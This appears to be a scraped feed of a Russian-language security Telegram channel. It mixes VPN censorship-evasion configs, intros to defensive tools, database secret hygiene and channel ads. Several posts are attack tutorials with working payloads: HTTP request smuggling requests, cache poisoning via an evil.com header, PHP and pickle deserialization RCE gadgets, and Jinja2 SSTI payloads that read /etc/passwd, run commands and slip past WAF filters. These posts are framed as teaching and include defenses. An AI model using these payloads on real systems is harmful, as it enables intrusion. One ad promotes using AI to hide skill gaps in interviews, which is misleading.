CodeGuard: CyberSec Edition

🛡 VPN для России 2026: VLESS Reality + Hysteria2 Shadowsocks под РКН DPI почти мёртв. Рабочие протоколы: Hysteria2 (QUIC), VLESS Reality, TUIC v5. WireGuard только через Cloudflare WARP с обфускацией.​ 1️⃣ Hysteria2 — №1 в РФ прямо сейчас 🔥QUIC UDP 443 = YouTube трафик для РКН 🔥Скорость 800+ Mbps, ping <30ms Сервер (5 мин):

curl -fsSL https://get.hy2.sh/ | bash  
hy2 server -c config.yaml  

config.yaml:

listen: :443  
auth:  
  type: password  
  password: YourStrongPass123  
masquerade:  
  type: proxy  
  proxy: https://www.youtube.com  

Клиенты: Nebulosa (iOS), NekoBox (Android/PC) 2️⃣ VLESS Reality — анти-DPI чемпион 🔥TLS fingerprint Chrome 122, grpc маскировка 🔥Конфиг для xray-core:

bash <(curl -Ls https://github.com/XTLS/Xray-install/raw/main/install-release.sh)  

{  
  "outbounds": [{  
    "protocol": "vless",  
    "settings": {"vnext": [{"address": "your.server.ru", "port": 443, "users": [{"id": "uuidgen"}] }]},  
    "streamSettings": {  
      "network": "grpc",  
      "security": "reality",  
      "realitySettings": {"dest": "www.google.com:443", "serverNames": ["www.google.com"]}  
    }  
  }]  
}  

3️⃣ Что юзать в 11.01.2026

🟢Hysteria2 — стриминг, торренты, всё 🟢VLESS Reality — если нужна grpc маскировка 🟢TUIC v5 — гейминг (ping 15-25ms) 🟢Cloudflare WARP — бесплатно, backup

❌Shadowsocks — меняй cipher каждые 2 дня или дроп ❌Чистый WireGuard/OpenVPN — блокируют за 24ч

😈 CodeGuard: PySec Edition | Чат

🛠 ZMap — супер‑быстрый сетевой сканер для исследования больших сетей ZMap — это open‑source сканер сети, созданный как сверх‑быстрая альтернатива Nmap. Он позволяет за десятки минут просканировать весь интернет‑диапазон IPv4 по одному порту, что делает его уникальным инструментом для исследований безопасности, обнаружения широкомасштабных уязвимостей и мониторинга IoT‑устройств. ⚙️ Ключевые возможности ZMap:

▶️ Молниеносное сканирование IPv4‑пространства (например, весь интернет за ~44 минуты на одном порту) ▶️ Поддержка модулей для анализа ответов хостов и оптимизации фильтров ▶️ Вывод результатов в удобные форматы (CSV, JSON) для дальнейшего анализа ▶️ Используется в исследованиях уязвимостей и для мониторинга больших сетей

⚡️ Быстрый старт с ZMap: Установка (Linux):

sudo apt install zmap

Пример сканирования:

sudo zmap -p 80 0.0.0.0/0 -o results.csv

Где ‑p — порт для проверки, 0.0.0.0/0 — весь IPv4, ‑o — файл вывода. 📌 GitHub & docs 😈 CodeGuard: PySec Edition | Чат

🚨Database secrets: 94% SQL/NoSQL взломов через 3 ошибки База данных с 1M пользователей? Поздравляй - 94% DB брешей через connection strings в коде или бэкапах. postgres://user:pass@db:5432/prod лежит в Git, S3, Docker images. ⚠️Где твои пароли БД уже утекли:

🔴Connection strings в .env или config 🔴pg_dump в S3 без шифрования 🔴Docker layers с /etc/postgresql 🔴Logs с SQL ошибками (relation "users" does not exist)

🔥7 команд → DB под замком 1️⃣ Найди все connection strings (ЭКСТРЕННО)

# Git history
git log -p | grep -E "(postgres|mysql|mongodb)://|password=|API_KEY"

# Docker images
docker images --format "{{.Repository}}" | xargs docker run --rm -it {} sh -c "grep -r password /etc"

# S3 backups
aws s3 ls s3://your-backups/ --recursive | grep dump | xargs aws s3 cp s3://your-backups/ - | strings | grep -i pass

2️⃣ Secrets manager ВМЕСТО .env

# AWS Secrets Manager (prod)
aws secretsmanager create-secret --name prod/db --secret-string '{"user":"app","password":"Xyz123"}'

# В коде
PGPASSWORD=$(aws secretsmanager get-secret-value --secret-id prod/db --query SecretString | jq -r .password)

3️⃣ Read-only роли (критично!!)

-- ❌ Никогда root/admin
CREATE USER app_ro NOSUPERUSER CREATEDB NOCREATEROLE;
GRANT SELECT ON ALL TABLES IN SCHEMA public TO app_ro;

-- App user только SELECT/INSERT в свои таблицы
CREATE USER app_rw NOSUPERUSER NOCREATEDB NOCREATEROLE;
GRANT USAGE ON SCHEMA public TO app_rw;
GRANT SELECT, INSERT ON users TO app_rw;

4️⃣ Network lockdown

# PostgreSQL pg_hba.conf
# ❌ localhost + %/0.0.0.0/0
host    all             all             10.0.0.0/24          md5

# ✅ Только app subnet
host    app_db          app_rw          10.42.0.0/16         scram-sha-256

5️⃣ Backups → encrypted

# pg_dump → GPG
pg_dump prod | gpg --encrypt -r backup@company.com > prod_$(date +%Y%m%d).sql.gpg

# S3 KMS
aws s3 cp prod.sql --sse aws:kms --sse-kms-key-id alias/db-backups s3://encrypted-backups/

6️⃣ Audit + WAL logs

# PostgreSQL
ALTER SYSTEM SET log_connections = on;
ALTER SYSTEM SET log_disconnections = on;
SELECT pg_reload_conf();

# Connection audit
sudo grep "app_rw.*connection authorized" /var/log/postgresql/postgresql-*.log

7️⃣ Rotate credentials (90 дней)

#!/bin/bash
# DB password rotation
NEW_PASS=$(openssl rand -base64 32)
psql -c "ALTER USER app_rw PASSWORD '$NEW_PASS';"
aws secretsmanager put-secret-value --secret-id prod/db --secret-string "{\"password\":\"$NEW_PASS\"}"

😈 CodeGuard: PySec Edition | Чат

😒 Подборка каналов по информационной безопасности Проверенные каналы по безопасности, которые реально помогают расти. 👍 ZeroDay — Уроки, эксплуатация уязвимостей с нуля 👍 Белый Хакер — Свежие новости из мира ИБ 😎 Бункер Хакера — Статьи, книги, шпаргалки и хакинг 👨‍💻 Серверная Админа — Настройка и уроки по компьютерным сетям 📂 Подписывайся

🐦 Zeek: сетевой анализ без сигнатур Zeek — это мощный open-source network security monitor, который анализирует сетевой трафик на уровне событий и поведения, а не сигнатур. Часто используют для threat hunting и расследований инцидентов. Подходит для SOC, blue team и анализа сложных атак внутри сети. ⚙️ Ключевые возможности Zeek:

▶️ Глубокий анализ сетевых протоколов (HTTP, DNS, SSL, FTP, SSH) ▶️ Поведенческое обнаружение аномалий ▶️ Подробные структурированные логи (conn, dns, http, ssl и др.) ▶️ Поддержка собственных скриптов для детекции ▶️ Интеграция с SIEM и ELK

⚡️ Быстрый старт с Zeek: Установка

sudo apt install zeek

Запуск анализа pcap

zeek -r traffic.pcap

Запуск на интерфейсе

sudo zeekctl deploy

Просмотр логов

ls /usr/local/zeek/logs/current

📱 GitHub 😈 CodeGuard: PySec Edition | Чат

🛡 Wazuh: SIEM и защита хостов в одном флаконе Wazuh — это open-source платформа для мониторинга безопасности, обнаружения вторжений и соответствия требованиям. Подходит для серверов, контейнеров и облаков. Часто используют как бесплатную альтернативу коммерческим SIEM. ⚙️ Ключевые возможности Wazuh:

▶️ HIDS — обнаружение атак и подозрительных действий на хосте ▶️ Анализ логов (SSH, sudo, nginx, systemd, Docker) ▶️ File Integrity Monitoring — контроль изменений файлов ▶️ Vulnerability Detection — поиск уязвимостей в ПО ▶️ Интеграция с Elastic Stack (Kibana, Elasticsearch)

⚡️ Быстрый старт с Wazuh: Установка (all-in-one):

curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a

Проверка статуса:

sudo systemctl status wazuh-manager

Подключение агента:

sudo wazuh-agent-auth -m <IP_MANAGER>

📱 GitHub 😈 CodeGuard: PySec Edition | Чат

ChatGPT всегда говорит, что ты прав 😂 А потом на деле оказываешься по локоть в логах и дебажишь то, что по словам gpt должно было работать идеально 😄 💋 Нейросети обучены льстить И им сложно НЕ соглашаться со всем подряд. ⚡️В NeuroNinja рабочие техники от инженера СберТехнологий. Честные заметки о том, как эффективно использовать LLM и реальные кейсы для твоих проектов. 👉 Подписаться: https://t.me/+0LcdDOKQwBU3MGRi

🛡 Fail2Ban: защита от взлома через логи Fail2Ban — это open-source инструмент для защиты серверов от brute-force атак, сканирования и подозрительных попыток входа. Он анализирует логи сервисов (SSH, nginx, ftp, mail) и автоматически блокирует подозрительные IP через firewall. ⚙️ Ключевые возможности Fail2Ban:

▶️ Мониторинг логов любых сервисов ▶️ Автоматическое банирование IP при множественных неудачных попытках ▶️ Настраиваемые фильтры и действия (ban, alert, custom scripts) ▶️ Поддержка iptables, nftables и firewalld ▶️ Масштабируемость через конфиги и собственные фильтры

⚡️ Быстрый старт с Fail2Ban: Установка (Ubuntu/Debian):

sudo apt update
sudo apt install fail2ban

Запуск и проверка:

sudo systemctl enable fail2ban
sudo systemctl start fail2ban
sudo fail2ban-client status

Настройка для SSH:

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo nano /etc/fail2ban/jail.local
# включить [sshd] и задать maxretry, bantime
sudo systemctl restart fail2ban

📱 GitHub 😈 CodeGuard: PySec Edition | Чат

🛡 CrowdSec: коллективная защита от атак CrowdSec — это open-source behavior-based IPS, который анализирует поведение трафика и автоматически блокирует атаки: brute-force, credential stuffing, сканирование, web-атаки и ботов. В отличие от классических WAF, CrowdSec работает как движок корреляции событий и использует глобальную базу угроз, формируемую сообществом. ⚙️ Ключевые возможности CrowdSec:

▶️ Анализ логов (nginx, apache, ssh, docker, cloud-сервисы) ▶️ Обнаружение атак по поведению, а не по сигнатурам ▶️ Автоматические решения: ban, captcha, rate-limit ▶️ Интеграция с firewall, reverse-proxy, cloud и CDN ▶️ Общая threat-intelligence база от тысяч инсталляций

⚡️ Быстрый старт с CrowdSec: Установка:

curl -s https://install.crowdsec.net | sudo sh
sudo apt install crowdsec

Проверка:

sudo cscli metrics

🟢Подключение bouncer (например, для nginx или firewall) 🟢Настройка сценариев и политик через collections 🟢 Автоматическое обновление правил из community-hub

🤯 Документация — CrowdSec Docs 📱 Репозиторий GitHub 😈 CodeGuard: PySec Edition | Чат

Сеньор за полгода? 📈 Эта девушка получила оффер в IT-компанию, хотя весь её опыт — пара курсов с ютуба 😱 Она воспользовалась ИИ-помощником и легко скрыла все свои пробелы в знаниях. Теперь впереди: ⤵️ удалёнка, стартовое обучение и ставка 55$ в час. Проходи собеседования вместе с Interview Ninja 🥷 Проверь успех на себе — есть 100 бесплатных запросов на день. 👉 @interview_ninja

🙈 HTTP Request Smuggling: когда серверы не согласны друг с другом Атака, при которой front-end и back-end серверы по-разному парсят границы HTTP-запросов. Результат - твой запрос «склеивается» с чужим. Последствия:

🔴Обход WAF и аутентификации 🔴Захват чужих запросов 🔴Cache poisoning на стероидах

1️⃣ В чём суть HTTP позволяет указать длину тела двумя способами: Content-Length и Transfer-Encoding: chunked Если front-end читает CL, а back-end - TE (или наоборот), атакующий прячет второй запрос внутри первого. 2️⃣ Мини-пример (CL.TE)

POST / HTTP/1.1
Content-Length: 13
Transfer-Encoding: chunked

0

GET /admin

Front-end видит 13 байт и пропускает всё. Back-end читает chunked, видит 0 (конец) - а GET /admin приклеивается к следующему запросу другого юзера. 3️⃣ Где искать

🔵Load balancer + backend 🔵CDN + origin 🔵Любая цепочка прокси

4️⃣ Защита

🔵HTTP/2 end-to-end 🔵Отклонять запросы с обоими заголовками 🔵Единый парсер на всех уровнях

😈 CodeGuard: PySec Edition | Чат

Рекомендую новый канал по ИБ — @N3tHunterLab Здесь реальный пентест-контент без воды: 🟣 Разборы уязвимостей и кейсы 🟣 OSINT-инструменты и гайды 🟣 Практика для админов/тестеров 🟣 Новости ИБ + ламповые посты Канал ведется действующим специалистом по ИБ. @N3tHunterLab

👩‍💻 Web Cache Poisoning: когда кэш работает против тебя Web Cache Poisoning — атака, при которой злоумышленник подсовывает вредный ответ в CDN или reverse-proxy. Последствия:

🔴 XSS для всех 🔴 подмена страниц 🔴 кража сессий

1️⃣ В чём суть Кэш учитывает одни заголовки, а backend — другие. Атакующий ищет заголовок, который влияет на формирование ответа, но при этом не участвует в cache key. 2️⃣ Мини-практика Добавь заголовок:

X-Forwarded-Host: evil.com

Если в ответе меняются ссылки или JS — проверь, кэшируется ли этот ответ. Повтори запрос без заголовка: если контент тот же → кэш отравлен. 3️⃣ Где встречается

🟢 CDN + backend 🟢 reverse proxy 🟢 high-load сайты

4️⃣ Защита

🟢 whitelist заголовков 🟢 cache key = все влияющие поля 🟢 no-store для динамики

😈 CodeGuard: PySec Edition | Чат

👩‍💻 HTTP Request Smuggling: атака между прокси и сервером Request Smuggling — редкая и опасная веб‑уязвимость, возникающая, когда прокси и backend по‑разному интерпретируют один HTTP‑запрос. Итог: один запрос превращается в два. Последствия:

🔴 обход авторизации 🔴 кража сессий 🔴 cache poisoning 🔴 скрытые запросы к /admin

1️⃣ В чём суть Конфликт заголовков Content-Length и Transfer-Encoding: chunked. Один компонент верит длине, другой — чанкам. 2️⃣ Пример (CL.TE)

POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: target.com

Proxy считает запрос завершённым, backend — выполняет GET /admin. 3️⃣ Как находят

🔴 несколько прокси / CDN 🔴 странные тайминги ответа 🔴 рассинхрон ответов

4️⃣ Где встречается

🟢 CDN + backend 🟢 Load balancer → legacy‑сервисы 🟢 Microservices 🟢 High‑load API

5️⃣ Защита

🟢запрещать CL + TE 🟢нормализовать запросы 🟢использовать HTTP/2 end‑to‑end

😈 CodeGuard: PySec Edition | Чат

💻Пока одни ставят антивирус, другие уже в дампе. Хочешь понимать, как реально ломают, а не как пишут в учебниках? Где фейлы DevOps превращаются в RCE, а «я просто открыл PDF» — в инцидент Здесь ты найдёшь: — хакинг без розовых пони — инфобез с матом и фактами — разборы уязвимостей, эксплойтов и громких взломов — мемы, после которых SOC плачет 🫵Подписывайся! 😂Предупреждение: после подписки ты начнёшь подозрительно смотреть на Wi-Fi и обновления.

🦈 WireShark Полный курс Часть-3 Добро пожаловать в третью часть нашего полного курса по Wireshark! Этот курс предназначен для тех, кто хочет овладеть мощными навыками анализа сетевого трафика и научиться эффективно использовать один из самых популярных инструментов для мониторинга и отладки сетей – Wireshark. 📱 Смотреть на Ютуб 😈 CodeGuard: PySec Edition | Чат

👩‍💻 Deserialization Attacks: когда данные превращаются в RCE Небезопасная десериализация — это когда приложение доверяет данным, которые само же и выполняет. Пользователь подсовывает объект → приложение его «восстанавливает» → код исполняется. Итог: RCE, LFI, logic abuse. 1️⃣ Что такое десериализация Десериализация — процесс восстановления объекта из байтов / строки. Примеры:

🟢Java: ObjectInputStream.readObject() 🟢PHP: unserialize() 🟢Python: pickle.loads() 🟢.NET: BinaryFormatter

2️⃣ Детекция уязвимости Признаки:

🔴 Base64 / бинарные blobs в cookies, headers, body 🔴 Параметры вроде data=, state=, profile= 🔴 Ошибки классов при кривом вводе

Пример (PHP):

$data = unserialize($_COOKIE['session']);

Тест:

O:8:"stdClass":1:{s:4:"test";s:4:"hack";}

Если приложение падает или реагирует — точка входа найдена. 3️⃣ Эксплуатация (примеры) PHP:

class Evil {
  public function __destruct() {
    system($_GET['cmd']);
  }
}

Python pickle:

import pickle, os

class RCE:
    def __reduce__(self):
        return (os.system, ("id",))

pickle.dumps(RCE())

4️⃣ Обход фильтров

🔴 Base64 + gzip 🔴 Использование разрешённых классов 🔴 Type juggling (PHP) 🔴 JSON → object cast 🔴 Partial deserialization

5️⃣ Где встречается чаще всего

🟢 Cookies (session, rememberMe) 🟢 JWT с кастомными payload’ами 🟢 Mobile API 🟢 Legacy Java apps 🟢 Microservices (internal trust)

6️⃣ Защита

🔴 Никогда не десериализуйте пользовательские данные 🔴 Используйте JSON + строгую схему 🔴 Allowlist классов 🔴 Отключайте опасные форматы (pickle, BinaryFormatter) 🔴 Подписывайте данные (HMAC) 🔴 IDS на gadget patterns

😈 CodeGuard: PySec Edition | Чат

👩‍💻 Всем программистам посвящается! Держите хороший авторский канал про разработку мини-проектов, игр и ботов на Python с объяснением, контент ежедневно пополняется новыми постами: Обучение Python с нуля Обучение Django с нуля Обучение Flask с нуля Обучение Pandas с нуля Обучение PyTorch с нуля Обучение NumPy с нуля 📌 Шпаргалки, гайды, ресурсы, задачи и советы — всё собрано в одном месте: @python_ready

🦈 WireShark Полный курс Часть-2 Добро пожаловать в вторую часть нашего полного курса по Wireshark! Этот курс предназначен для тех, кто хочет овладеть мощными навыками анализа сетевого трафика и научиться эффективно использовать один из самых популярных инструментов для мониторинга и отладки сетей – Wireshark. 📱 Смотреть на Ютуб 😈 CodeGuard: PySec Edition | Чат

👩‍💻 SSTI: инъекции в шаблонизаторы — от детекта до RCE Server-Side Template Injection - когда пользовательский ввод попадает прямо в шаблон. Результат? Выполнение кода на сервере. Разбираем по шагам. 1️⃣ Детекция уязвимости Базовые полиглот-пейлоады для теста:

${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>

Если видите 49 в ответе - шаблонизатор исполняет код. 2️⃣ Идентификация движка

{{7*'7'}} → 7777777 = Jinja2/Twig
{{7*'7'}} → 49 = Twig
${7*7} → 49 = Mako/FreeMarker
#{7*7} → 49 = Ruby ERB

Автоматизация через tplmap:

git clone https://github.com/epinna/tplmap
python tplmap.py -u "http://target.com/?name=test"

3️⃣ Эксплуатация Jinja2 (Flask) Чтение файлов:

{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}

RCE через subprocess:

{{ ''.__class__.__mro__[1].__subclasses__()[408]('id', shell=True, stdout=-1).communicate() }}

Поиск нужного класса:

{% for c in ''.__class__.__mro__[1].__subclasses__() %}
  {% if 'Popen' in c.__name__ %}
    {{ loop.index0 }}: {{ c }}
  {% endif %}
{% endfor %}

4️⃣ Обход WAF и фильтров Без точек и скобок:

{{ request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f') }}

Конкатенация строк:

{{ ''['__cla'+'ss__'] }}

Hex-кодирование:

{{ ''['\x5f\x5fclass\x5f\x5f'] }}

5️⃣ Защита

🔴Никогда не передавайте пользовательский ввод в render_template_string() 🔴Используйте sandbox-режим (Jinja2 SandboxedEnvironment) 🔴Экранируйте всё через | e фильтр 🔴CSP и мониторинг аномальных запросов

😈 CodeGuard: PySec Edition | Чат